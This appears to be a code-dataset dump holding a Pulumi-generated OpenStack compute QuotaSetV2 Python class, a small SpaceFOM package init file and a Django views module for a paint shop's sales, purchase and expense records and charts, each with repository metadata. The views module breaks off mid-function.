Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_groups")
@security_groups.setter
def security_groups(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "security_groups", value)
@property
@pulumi.getter(name="serverGroupMembers")
def server_group_members(self) -> Optional[pulumi.Input[int]]:
"""
        Quota value for server group members.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_group_members")
@server_group_members.setter
def server_group_members(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "server_group_members", value)
@property
@pulumi.getter(name="serverGroups")
def server_groups(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for server groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_groups")
@server_groups.setter
def server_groups(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "server_groups", value)
class QuotaSetV2(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cores: Optional[pulumi.Input[int]] = None,
fixed_ips: Optional[pulumi.Input[int]] = None,
floating_ips: Optional[pulumi.Input[int]] = None,
injected_file_content_bytes: Optional[pulumi.Input[int]] = None,
injected_file_path_bytes: Optional[pulumi.Input[int]] = None,
injected_files: Optional[pulumi.Input[int]] = None,
instances: Optional[pulumi.Input[int]] = None,
key_pairs: Optional[pulumi.Input[int]] = None,
metadata_items: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ram: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_rules: Optional[pulumi.Input[int]] = None,
security_groups: Optional[pulumi.Input[int]] = None,
server_group_members: Optional[pulumi.Input[int]] = None,
server_groups: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Manages a V2 compute quotaset resource within OpenStack.
> **Note:** This usually requires admin privileges.
        > **Note:** This resource has a no-op deletion, so no actual actions will be taken against the OpenStack API
        in case of a delete call.
        > **Note:** This resource has all-in creation, so all optional quota arguments that were not specified are
        created with a zero value.
## Example Usage
```python
import pulumi
import pulumi_openstack as openstack
project1 = openstack.identity.Project("project1")
quotaset1 = openstack.compute.QuotaSetV2("quotaset1",
project_id=project1.id,
key_pairs=10,
ram=40960,
cores=32,
instances=20,
server_groups=4,
server_group_members=8)
```
## Import
Quotasets can be imported using the `project_id/region_name`, e.g.
```sh
$ pulumi import openstack:compute/quotaSetV2:QuotaSetV2 quotaset_1 2a0f2240-c5e6-41de-896d-e80d97428d6b/region_1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] cores: Quota value for cores.
Changing this updates the existing quotaset.
:param pulumi.Input[int] fixed_ips: Quota value for fixed IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] floating_ips: Quota value for floating IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_content_bytes: Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_path_bytes: Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_files: Quota value for injected files.
Changing this updates the existing quotaset.
:param pulumi.Input[int] instances: Quota value for instances.
Changing this updates the existing quotaset.
:param pulumi.Input[int] key_pairs: Quota value for key pairs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] metadata_items: Quota value for metadata items.
Changing this updates the existing quotaset.
:param pulumi.Input[str] project_id: ID of the project to manage quotas.
Changing this creates a new quotaset.
:param pulumi.Input[int] ram: Quota value for RAM.
Changing this updates the existing quotaset.
        :param pulumi.Input[str] region: The region in which to create the quotaset. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
:param pulumi.Input[int] security_group_rules: Quota value for security group rules.
Changing this updates the existing quotaset.
:param pulumi.Input[int] security_groups: Quota value for security groups.
Changing this updates the existing quotaset.
        :param pulumi.Input[int] server_group_members: Quota value for server group members.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_groups: Quota value for server groups.
Changing this updates the existing quotaset.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: QuotaSetV2Args,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a V2 compute quotaset resource within OpenStack.
> **Note:** This usually requires admin privileges.
        > **Note:** This resource has a no-op deletion, so no actual actions will be taken against the OpenStack API
        in case of a delete call.
        > **Note:** This resource has all-in creation, so all optional quota arguments that were not specified are
        created with a zero value.
## Example Usage
```python
import pulumi
import pulumi_openstack as openstack
project1 = openstack.identity.Project("project1")
quotaset1 = openstack.compute.QuotaSetV2("quotaset1",
project_id=project1.id,
key_pairs=10,
ram=40960,
cores=32,
instances=20,
server_groups=4,
server_group_members=8)
```
## Import
Quotasets can be imported using the `project_id/region_name`, e.g.
```sh
$ pulumi import openstack:compute/quotaSetV2:QuotaSetV2 quotaset_1 2a0f2240-c5e6-41de-896d-e80d97428d6b/region_1
```
:param str resource_name: The name of the resource.
:param QuotaSetV2Args args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(QuotaSetV2Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cores: Optional[pulumi.Input[int]] = None,
fixed_ips: Optional[pulumi.Input[int]] = None,
floating_ips: Optional[pulumi.Input[int]] = None,
injected_file_content_bytes: Optional[pulumi.Input[int]] = None,
injected_file_path_bytes: Optional[pulumi.Input[int]] = None,
injected_files: Optional[pulumi.Input[int]] = None,
instances: Optional[pulumi.Input[int]] = None,
key_pairs: Optional[pulumi.Input[int]] = None,
metadata_items: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ram: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_rules: Optional[pulumi.Input[int]] = None,
security_groups: Optional[pulumi.Input[int]] = None,
server_group_members: Optional[pulumi.Input[int]] = None,
server_groups: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = QuotaSetV2Args.__new__(QuotaSetV2Args)
__props__.__dict__["cores"] = cores
__props__.__dict__["fixed_ips"] = fixed_ips
__props__.__dict__["floating_ips"] = floating_ips
__props__.__dict__["injected_file_content_bytes"] = injected_file_content_bytes
__props__.__dict__["injected_file_path_bytes"] = injected_file_path_bytes
__props__.__dict__["injected_files"] = injected_files
__props__.__dict__["instances"] = instances
__props__.__dict__["key_pairs"] = key_pairs
__props__.__dict__["metadata_items"] = metadata_items
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
__props__.__dict__["ram"] = ram
__props__.__dict__["region"] = region
__props__.__dict__["security_group_rules"] = security_group_rules
__props__.__dict__["security_groups"] = security_groups
__props__.__dict__["server_group_members"] = server_group_members
__props__.__dict__["server_groups"] = server_groups
super(QuotaSetV2, __self__).__init__(
'openstack:compute/quotaSetV2:QuotaSetV2',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cores: Optional[pulumi.Input[int]] = None,
fixed_ips: Optional[pulumi.Input[int]] = None,
floating_ips: Optional[pulumi.Input[int]] = None,
injected_file_content_bytes: Optional[pulumi.Input[int]] = None,
injected_file_path_bytes: Optional[pulumi.Input[int]] = None,
injected_files: Optional[pulumi.Input[int]] = None,
instances: Optional[pulumi.Input[int]] = None,
key_pairs: Optional[pulumi.Input[int]] = None,
metadata_items: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ram: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_rules: Optional[pulumi.Input[int]] = None,
security_groups: Optional[pulumi.Input[int]] = None,
server_group_members: Optional[pulumi.Input[int]] = None,
server_groups: Optional[pulumi.Input[int]] = None) -> 'QuotaSetV2':
"""
Get an existing QuotaSetV2 resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] cores: Quota value for cores.
Changing this updates the existing quotaset.
:param pulumi.Input[int] fixed_ips: Quota value for fixed IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] floating_ips: Quota value for floating IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_content_bytes: Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_path_bytes: Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_files: Quota value for injected files.
Changing this updates the existing quotaset.
:param pulumi.Input[int] instances: Quota value for instances.
Changing this updates the existing quotaset.
:param pulumi.Input[int] key_pairs: Quota value for key pairs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] metadata_items: Quota value for metadata items.
Changing this updates the existing quotaset.
:param pulumi.Input[str] project_id: ID of the project to manage quotas.
Changing this creates a new quotaset.
:param pulumi.Input[int] ram: Quota value for RAM.
Changing this updates the existing quotaset.
        :param pulumi.Input[str] region: The region in which to create the quotaset. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
:param pulumi.Input[int] security_group_rules: Quota value for security group rules.
Changing this updates the existing quotaset.
:param pulumi.Input[int] security_groups: Quota value for security groups.
Changing this updates the existing quotaset.
        :param pulumi.Input[int] server_group_members: Quota value for server group members.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_groups: Quota value for server groups.
Changing this updates the existing quotaset.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _QuotaSetV2State.__new__(_QuotaSetV2State)
__props__.__dict__["cores"] = cores
__props__.__dict__["fixed_ips"] = fixed_ips
__props__.__dict__["floating_ips"] = floating_ips
__props__.__dict__["injected_file_content_bytes"] = injected_file_content_bytes
__props__.__dict__["injected_file_path_bytes"] = injected_file_path_bytes
__props__.__dict__["injected_files"] = injected_files
__props__.__dict__["instances"] = instances
__props__.__dict__["key_pairs"] = key_pairs
__props__.__dict__["metadata_items"] = metadata_items
__props__.__dict__["project_id"] = project_id
__props__.__dict__["ram"] = ram
__props__.__dict__["region"] = region
__props__.__dict__["security_group_rules"] = security_group_rules
__props__.__dict__["security_groups"] = security_groups
__props__.__dict__["server_group_members"] = server_group_members
__props__.__dict__["server_groups"] = server_groups
return QuotaSetV2(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def cores(self) -> pulumi.Output[int]:
"""
Quota value for cores.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "cores")
@property
@pulumi.getter(name="fixedIps")
def fixed_ips(self) -> pulumi.Output[int]:
"""
Quota value for fixed IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "fixed_ips")
@property
@pulumi.getter(name="floatingIps")
def floating_ips(self) -> pulumi.Output[int]:
"""
Quota value for floating IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "floating_ips")
@property
@pulumi.getter(name="injectedFileContentBytes")
def injected_file_content_bytes(self) -> pulumi.Output[int]:
"""
Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_content_bytes")
@property
@pulumi.getter(name="injectedFilePathBytes")
def injected_file_path_bytes(self) -> pulumi.Output[int]:
"""
Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_path_bytes")
@property
@pulumi.getter(name="injectedFiles")
def injected_files(self) -> pulumi.Output[int]:
"""
Quota value for injected files.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_files")
@property
@pulumi.getter
def instances(self) -> pulumi.Output[int]:
"""
Quota value for instances.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "instances")
@property
@pulumi.getter(name="keyPairs")
def key_pairs(self) -> pulumi.Output[int]:
"""
Quota value for key pairs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "key_pairs")
@property
@pulumi.getter(name="metadataItems")
def metadata_items(self) -> pulumi.Output[int]:
"""
Quota value for metadata items.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "metadata_items")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
ID of the project to manage quotas.
Changing this creates a new quotaset.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def ram(self) -> pulumi.Output[int]:
"""
Quota value for RAM.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "ram")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
        The region in which to create the quotaset. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="securityGroupRules")
def security_group_rules(self) -> pulumi.Output[int]:
"""
Quota value for security group rules.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_group_rules")
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> pulumi.Output[int]:
"""
Quota value for security groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_groups")
@property
@pulumi.getter(name="serverGroupMembers")
def server_group_members(self) -> pulumi.Output[int]:
"""
        Quota value for server group members.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_group_members")
@property
@pulumi.getter(name="serverGroups")
def server_groups(self) -> pulumi.Output[int]:
"""
Quota value for server groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_groups")
| 42.158807
| 134
| 0.641577
| 5,090
| 43,803
| 5.303536
| 0.044204
| 0.086386
| 0.094388
| 0.102686
| 0.938878
| 0.933136
| 0.928468
| 0.92243
| 0.914688
| 0.898537
| 0
| 0.003449
| 0.265187
| 43,803
| 1,038
| 135
| 42.199422
| 0.835244
| 0.340913
| 0
| 0.877395
| 1
| 0
| 0.103588
| 0.024605
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0.001916
| 0.009579
| 0
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
405e508a120ee9c6808a59ababde5f500118f698
| 113
|
py
|
Python
|
Modified_data/SpaceFOM/__init__.py
|
jiajlin/TrickHLA
|
ae704b97049579e997593ae6d8dd016010b8fa1e
|
[
"NASA-1.3"
] | 18
|
2020-03-04T14:23:08.000Z
|
2022-03-17T10:47:21.000Z
|
Modified_data/SpaceFOM/__init__.py
|
jiajlin/TrickHLA
|
ae704b97049579e997593ae6d8dd016010b8fa1e
|
[
"NASA-1.3"
] | 57
|
2020-06-04T16:03:44.000Z
|
2021-05-17T20:54:35.000Z
|
Modified_data/SpaceFOM/__init__.py
|
jiajlin/TrickHLA
|
ae704b97049579e997593ae6d8dd016010b8fa1e
|
[
"NASA-1.3"
] | 5
|
2020-08-25T05:51:05.000Z
|
2021-10-01T18:37:38.000Z
|
from .SpaceFOMFederateConfig import *
from .SpaceFOMMTRInteraction import *
from .SpaceFOMRefFrameObject import *
| 37.666667
| 37
| 0.849558
| 9
| 113
| 10.666667
| 0.555556
| 0.208333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097345
| 113
| 3
| 38
| 37.666667
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
40b6fd139983cf0c352f7637f9421ca84dcb3d9f
| 20,732
|
py
|
Python
|
paint/views.py
|
atulk17/Paint-App
|
4b56455596d140cee4a9b19c71fe82364c3f3b7c
|
[
"BSD-2-Clause"
] | null | null | null |
paint/views.py
|
atulk17/Paint-App
|
4b56455596d140cee4a9b19c71fe82364c3f3b7c
|
[
"BSD-2-Clause"
] | null | null | null |
paint/views.py
|
atulk17/Paint-App
|
4b56455596d140cee4a9b19c71fe82364c3f3b7c
|
[
"BSD-2-Clause"
] | 1
|
2020-05-31T11:37:48.000Z
|
2020-05-31T11:37:48.000Z
|
from django.shortcuts import render
from .forms import SearchCustomerForm, SearchDistributorForm, SearchProductForm
from django.http import HttpResponse, JsonResponse
from .models import Customers, Sale_Consists_of, Sales, Delivers, Distributor, Products, Purchase, Office_Expense
import sqlite3
def home(request):
return render(request,'index.htm')
def analysis(request):
return render(request, 'Analysis.htm')
def newrecord(request):
return render(request, 'NewRecords.htm')
def shoprecord(request):
return render(request, 'Shoprecords.htm')
def chartj(request):
return render(request, 'purchasechart.htm')
def chartjy(request):
return render(request, 'purchasecharty.htm')
def charts(request):
return render(request, 'salechart.htm')
def chartsy(request):
return render(request,'salechartyearly.htm')
def chartoe(request):
return render(request, 'oechart.htm')
def chartoey(request):
return render(request, 'oecharty.htm')
def chartpl(request):
return render(request, 'plchart.htm')
def chartply(request):
return render(request, 'plcharty.htm')
def search_customer(request):
if request.method == "POST":
form=SearchCustomerForm(request.POST)
if form.is_valid():
name=form.cleaned_data.get('customer_name')
phone=form.cleaned_data.get('phone')
name='%'+name+'%'
phone='%'+phone+'%'
q = Customers.objects.raw('SELECT * FROM Customers WHERE Contact like %s and Customer_name like %s',[phone,name])
context = {'customer': q}
return render(request, 'customerdetails.htm', context)
else:
q2= Customers.objects.raw('SELECT * FROM Customers')
form = SearchCustomerForm()
return render(request, 'searchc.htm', {'form': form ,'cust':q2})
def search_Distributor(request):
if request.method == "POST":
form=SearchDistributorForm(request.POST)
if form.is_valid():
name=form.cleaned_data.get('Distributor_name')
phone=form.cleaned_data.get('phone')
name='%'+name+'%'
phone='%'+phone+'%'
q = Distributor.objects.raw('SELECT * FROM Distributor WHERE Contact_no like %s and Distributor_name like %s',[phone,name])
context = {'distributor': q}
return render(request, 'disdetails.htm', context)
else:
q2=Distributor.objects.raw('SELECT * FROM Distributor')
form = SearchDistributorForm()
return render(request, 'searchd.htm', {'form': form,'dist':q2})
def search_product(request):
if request.method == "POST":
form=SearchProductForm(request.POST)
if form.is_valid():
name=form.cleaned_data.get('product_name')
name='%'+name+'%'
q = Products.objects.raw('SELECT * FROM Products WHERE Product_name like %s',[name])
context = {'product': q}
return render(request, 'prodetails.htm', context)
else:
q2 = Products.objects.raw('SELECT * FROM Products')
form = SearchProductForm()
return render(request, 'searchp.htm', {'form': form,'prod':q2})
def track_delivery(request):
q2=Customers.objects.raw('SELECT C.Customer_id, C.Customer_name, S.Total_amount, S.Date_of_order, S.Invoice_no, SC.Delivery_status from Customers as C, Sales as S, Delivers as SC where C.Customer_id=S.Customer_id_id and S.Invoice_no=SC.Invoice_no_id and SC.Delivery_status = "NOT DELIVERED"')
context = {'del': q2}
return render(request, 'deldetails.htm', context)
def purchasechart(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,7) as "Month", sum(Total_amount) as Amount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Month,
'data': Amount,
})
def purchasechartyear(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,4) as "Month", sum(Total_amount) as Amount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,4)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Month,
'data': Amount,
})
def salechart(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_order,1,7) as "Month", sum(Total_amount) as Amount, Invoice_no from Sales group by substr(Date_of_order,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Month,
'data': Amount,
})
def salechartyear(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_order,1,4) as "Year", sum(Total_amount) as Amount, Invoice_no from Sales group by substr(Date_of_order,1,4)')
Year=[]
Amount=[]
for key in c.fetchall():
Year.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Year,
'data': Amount,
})
def oechart(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Expenditure_date,1,7) as "Month", sum(Amount) as Amount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Month,
'data': Amount,
})
def oecharty(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Expenditure_date,1,4) as "Month", sum(Amount) as Amount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,4)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Month,
'data': Amount,
})
def profitchart(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,7) as "Month", sum(Total_amount) as PAmount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,7)')
Month=[]
PAmount=[]
for key in c.fetchall():
Month.append(key[0])
PAmount.append(key[1])
c.execute('SELECT substr(Date_of_order,1,7) as "SMonth", sum(Total_amount) as SAmount, Invoice_no from Sales group by substr(Date_of_order,1,7)')
SMonth=[]
SAmount=[]
for key in c.fetchall():
SMonth.append(key[0])
SAmount.append(key[1])
c.execute('SELECT substr(Expenditure_date,1,7) as "OMonth", sum(Amount) as OEAmount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,7)')
OEAmount=[]
for key in c.fetchall():
OEAmount.append(key[1])
res_list = []
    for i in range(0, len(SAmount)):
res_list.append(SAmount[i]-(PAmount[i] + OEAmount[i]))
return JsonResponse(data={
'labels': Month,
'dataa': res_list,
})
def profitcharty(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,4) as "Month", sum(Total_amount) as PAmount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,4)')
Month=[]
PAmount=[]
for key in c.fetchall():
Month.append(key[0])
PAmount.append(key[1])
c.execute('SELECT substr(Date_of_order,1,4) as "SMonth", sum(Total_amount) as SAmount, Invoice_no from Sales group by substr(Date_of_order,1,4)')
SMonth=[]
SAmount=[]
for key in c.fetchall():
SMonth.append(key[0])
SAmount.append(key[1])
c.execute('SELECT substr(Expenditure_date,1,4) as "OMonth", sum(Amount) as OEAmount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,4)')
OEAmount=[]
for key in c.fetchall():
OEAmount.append(key[1])
res_list = []
for i in range(0, len(SAmount)):
res_list.append(SAmount[i]-(PAmount[i] + OEAmount[i]))
return JsonResponse(data={
'labels': Month,
'dataa': res_list,
})
def salechartcrm(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_order,1,7) as "Month", sum(Total_amount) as Amount, Invoice_no from Sales group by substr(Date_of_order,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total sales in %s is less than the sales in %s by a margin of Rs. %d . There is a %.2f%% decline in sales" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total sales in %s is more than the sales in %s by a margin of Rs. %d . There is a %.2f%% increase in sales" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total sales in %s is equal to the sales in %s. There is no change in sales" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def salechartcry(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_order,1,4) as "Month", sum(Total_amount) as Amount, Invoice_no from Sales group by substr(Date_of_order,1,4)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total sales in %s is less than the sales in %s by a margin of Rs. %d . There is a %.2f%% decline in sales" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total sales in %s is more than the sales in %s by a margin of Rs. %d . There is a %.2f%% increase in sales" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total sales in %s is equal to the sales in %s. There is no change in sales" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def purchasechartcrm(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,7) as "Month", sum(Total_amount) as Amount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total purchases in %s is less than the purchases in %s by a margin of Rs. %d . There is a %.2f%% decline in purchases" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total purchases in %s is more than the purchases in %s by a margin of Rs. %d . There is a %.2f%% increase in purchases" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total purchases in %s is equal to the purchases in %s. There is no change in purchases" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def purchasechartcry(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,4) as "Month", sum(Total_amount) as Amount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,4)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total purchases in %s is less than the purchases in %s by a margin of Rs. %d . There is a %.2f%% decline in purchases" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total purchases in %s is more than the purchases in %s by a margin of Rs. %d . There is a %.2f%% increase in purchases" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total purchases in %s is equal to the purchases in %s. There is no change in purchases" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def oechartcrm(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Expenditure_date,1,7) as "Month", sum(Amount) as Amount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total Office Expenses in %s is less than the Office Expenses in %s by a margin of Rs. %d . There is a %.2f%% decline in Office Expenses" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total Office Expenses in %s is more than the Office Expenses in %s by a margin of Rs. %d . There is a %.2f%% increase in Office Expenses" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total Office Expenses in %s is equal to the Office Expenses in %s. There is no change in Office Expenses" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def oechartcry(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Expenditure_date,1,4) as "Month", sum(Amount) as Amount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,4)')
Month=[]
Amount=[]
